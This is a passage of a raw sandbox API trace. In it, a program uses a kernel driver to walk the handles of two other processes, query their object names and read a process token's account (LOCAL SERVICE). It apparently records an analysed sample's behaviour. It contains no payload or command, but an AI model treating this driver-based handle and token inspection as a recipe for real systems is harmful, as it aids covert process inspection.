ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.946] ObfDereferenceObject (Object=0xffffe00069b83090) returned 0x8000 [0264.947] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.947] PsAcquireProcessExitSynchronization () returned 0x0 [0264.947] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.947] ObReferenceObjectByHandle (in: Handle=0x4f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b838b0, HandleInformation=0x0) returned 0x0 [0264.947] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.947] PsReleaseProcessExitSynchronization () returned 0x2 [0264.947] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff3 [0264.947] ObQueryNameString (in: Object=0xffffe00069b838b0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.947] ObfDereferenceObject (Object=0xffffe00069b838b0) returned 0x7ffe [0264.947] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.947] PsAcquireProcessExitSynchronization () returned 0x0 [0264.947] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.947] ObReferenceObjectByHandle (in: Handle=0x4f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b83740, HandleInformation=0x0) returned 0x0 [0264.947] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.947] PsReleaseProcessExitSynchronization () returned 0x2 [0264.947] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff2 [0264.947] ObQueryNameString (in: Object=0xffffe00069b83740, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.947] ObfDereferenceObject (Object=0xffffe00069b83740) returned 0x7ffe [0264.947] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.947] PsAcquireProcessExitSynchronization () returned 0x0 [0264.947] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.947] ObReferenceObjectByHandle (in: Handle=0x54c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fd3950, HandleInformation=0x0) returned 0x0 [0264.947] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.947] PsReleaseProcessExitSynchronization () returned 0x2 [0264.947] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff1 [0264.947] ObQueryNameString (in: Object=0xffffe00072a93060, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.947] ObfDereferenceObject (Object=0xffffe00069fd3950) returned 0x7ffc [0264.947] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.947] PsAcquireProcessExitSynchronization () returned 0x0 [0264.947] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.947] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a019db0, HandleInformation=0x0) returned 0x0 [0264.947] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.947] PsReleaseProcessExitSynchronization () returned 0x2 [0264.947] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47ff0 [0264.947] ObQueryNameString (in: Object=0xffffe0006a019db0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.947] ObfDereferenceObject (Object=0xffffe0006a019db0) returned 0x7fe0 [0264.947] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.947] PsAcquireProcessExitSynchronization () returned 0x0 [0264.947] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.947] ObReferenceObjectByHandle (in: Handle=0x5cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a345f20, HandleInformation=0x0) returned 0x0 [0264.947] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.947] PsReleaseProcessExitSynchronization () returned 0x2 [0264.947] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fef [0264.947] ObQueryNameString (in: Object=0xffffe0006a345f20, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.947] ObfDereferenceObject (Object=0xffffe0006a345f20) returned 0x7fff [0264.947] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.948] PsAcquireProcessExitSynchronization () returned 0x0 [0264.948] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.948] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bc42e0, HandleInformation=0x0) returned 0x0 [0264.948] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.948] PsReleaseProcessExitSynchronization () returned 0x2 [0264.948] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fee [0264.948] ObQueryNameString (in: Object=0xffffe00069bc42e0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.948] ObfDereferenceObject (Object=0xffffe00069bc42e0) returned 0x7fff [0264.948] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.948] PsAcquireProcessExitSynchronization () returned 0x0 [0264.948] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.948] ObReferenceObjectByHandle (in: Handle=0x5e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a288310, HandleInformation=0x0) returned 0x0 [0264.948] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.948] PsReleaseProcessExitSynchronization () returned 0x2 [0264.948] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fed [0264.948] ObQueryNameString (in: Object=0xffffe0006a288310, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.948] ObfDereferenceObject (Object=0xffffe0006a288310) returned 0x7fff [0264.948] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.948] PsAcquireProcessExitSynchronization () returned 0x0 [0264.948] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.948] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a391d10, HandleInformation=0x0) returned 0x0 [0264.948] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.948] PsReleaseProcessExitSynchronization () returned 0x2 [0264.948] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fec [0264.948] ObQueryNameString (in: Object=0xffffe00068a45730, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.948] ObfDereferenceObject (Object=0xffffe0006a391d10) returned 0x7ffc [0264.948] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.948] PsAcquireProcessExitSynchronization () returned 0x0 [0264.948] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.948] ObReferenceObjectByHandle (in: Handle=0x678, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001484bf7d0, HandleInformation=0x0) returned 0x0 [0264.948] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.948] PsReleaseProcessExitSynchronization () returned 0x2 [0264.948] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47feb [0264.948] ObQueryNameString (in: Object=0xffffc001484bf7d0, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.948] ObfDereferenceObject (Object=0xffffc001484bf7d0) returned 0x17ffe [0264.948] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.948] PsAcquireProcessExitSynchronization () returned 0x0 [0264.948] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.948] ObReferenceObjectByHandle (in: Handle=0x6bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000685bc8e0, HandleInformation=0x0) returned 0x0 [0264.948] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.948] PsReleaseProcessExitSynchronization () returned 0x2 [0264.948] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fea [0264.948] ObQueryNameString (in: Object=0xffffe00068a45730, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.948] ObfDereferenceObject (Object=0xffffe000685bc8e0) returned 0x8000 [0264.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x180 [0264.948] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.949] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069861080, HandleInformation=0x0) returned 0x0 [0264.949] ObOpenObjectByPointer (in: Object=0xffffe00069861080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.949] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x4002e [0264.949] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.949] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.949] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.949] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.950] CloseHandle (hObject=0x1a8) returned 1 [0264.950] CloseHandle (hObject=0x180) returned 1 [0264.950] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.950] PsAcquireProcessExitSynchronization () returned 0x0 [0264.950] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.950] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069862090, HandleInformation=0x0) returned 0x0 [0264.950] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.951] PsReleaseProcessExitSynchronization () returned 0x2 [0264.951] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3802c [0264.951] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.951] ObfDereferenceObject (Object=0xffffe00069862090) returned 0x7fff [0264.951] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.951] PsAcquireProcessExitSynchronization () returned 0x0 [0264.951] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.951] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069866300, HandleInformation=0x0) returned 0x0 [0264.951] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.951] PsReleaseProcessExitSynchronization () returned 0x2 [0264.951] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3802b [0264.951] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.951] ObfDereferenceObject (Object=0xffffe00069866300) returned 0x7ffc [0264.951] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.951] PsAcquireProcessExitSynchronization () returned 0x0 [0264.951] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.951] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069866670, HandleInformation=0x0) returned 0x0 [0264.951] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.951] PsReleaseProcessExitSynchronization () returned 0x2 [0264.951] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3802a [0264.951] ObQueryNameString (in: Object=0xffffe00069866670, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.951] ObfDereferenceObject (Object=0xffffe00069866670) returned 0x7fff [0264.951] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.951] PsAcquireProcessExitSynchronization () returned 0x0 [0264.951] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.951] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069294e10, HandleInformation=0x0) returned 0x0 [0264.951] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.951] PsReleaseProcessExitSynchronization () returned 0x2 [0264.951] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38029 [0264.951] ObQueryNameString (in: Object=0xffffe00069294e10, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.951] ObfDereferenceObject (Object=0xffffe00069294e10) returned 0x7ff1 [0264.951] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.951] PsAcquireProcessExitSynchronization () returned 0x0 [0264.951] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.951] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.951] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.951] PsReleaseProcessExitSynchronization () returned 0x2 [0264.951] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38028 [0264.951] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.951] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff2 [0264.951] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.951] PsAcquireProcessExitSynchronization () returned 0x0 [0264.951] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.951] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.951] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.952] PsReleaseProcessExitSynchronization () returned 0x2 [0264.952] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38027 [0264.952] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.952] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff1 [0264.952] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.952] PsAcquireProcessExitSynchronization () returned 0x0 [0264.952] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.952] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069e5da80, HandleInformation=0x0) returned 0x0 [0264.952] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.952] PsReleaseProcessExitSynchronization () returned 0x2 [0264.952] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38026 [0264.952] ObQueryNameString (in: Object=0xffffe00069e5da80, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.952] ObfDereferenceObject (Object=0xffffe00069e5da80) returned 0x8000 [0264.952] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.952] PsAcquireProcessExitSynchronization () returned 0x0 [0264.952] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.952] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fb12b0, HandleInformation=0x0) returned 0x0 [0264.952] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.952] PsReleaseProcessExitSynchronization () returned 0x2 [0264.952] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38025 [0264.952] ObQueryNameString (in: Object=0xffffe00069fb12b0, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.952] ObfDereferenceObject (Object=0xffffe00069fb12b0) returned 0x7ff1 [0264.952] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.952] PsAcquireProcessExitSynchronization () returned 0x0 [0264.952] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.952] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699e0ae0, HandleInformation=0x0) returned 0x0 [0264.952] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.952] PsReleaseProcessExitSynchronization () returned 0x2 [0264.952] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38024 [0264.952] ObQueryNameString (in: Object=0xffffe000699e0ae0, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.952] ObfDereferenceObject (Object=0xffffe000699e0ae0) returned 0x7b43 [0264.952] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.952] PsAcquireProcessExitSynchronization () returned 0x0 [0264.952] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.952] ObReferenceObjectByHandle (in: Handle=0x218, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00077debc80, HandleInformation=0x0) returned 0x0 [0264.952] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.952] PsReleaseProcessExitSynchronization () returned 0x2 [0264.952] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38023 [0264.952] ObQueryNameString (in: Object=0xffffe00077debc80, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.952] ObfDereferenceObject (Object=0xffffe00077debc80) returned 0x7ff2 [0264.952] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.952] PsAcquireProcessExitSynchronization () returned 0x0 [0264.952] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.952] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069ba2b70, HandleInformation=0x0) returned 0x0 [0264.952] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.952] PsReleaseProcessExitSynchronization () returned 0x2 [0264.953] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38022 [0264.953] ObQueryNameString (in: Object=0xffffe00069ba2b70, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.953] ObfDereferenceObject (Object=0xffffe00069ba2b70) returned 0x7fb2 [0264.953] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.953] PsAcquireProcessExitSynchronization () returned 0x0 [0264.953] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.953] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fcf2f0, HandleInformation=0x0) returned 0x0 [0264.953] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.953] PsReleaseProcessExitSynchronization () returned 0x2 [0264.953] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38021 [0264.953] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.953] ObfDereferenceObject (Object=0xffffe00069fcf2f0) returned 0x7ffe [0264.953] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.953] PsAcquireProcessExitSynchronization () returned 0x0 [0264.953] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.953] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, 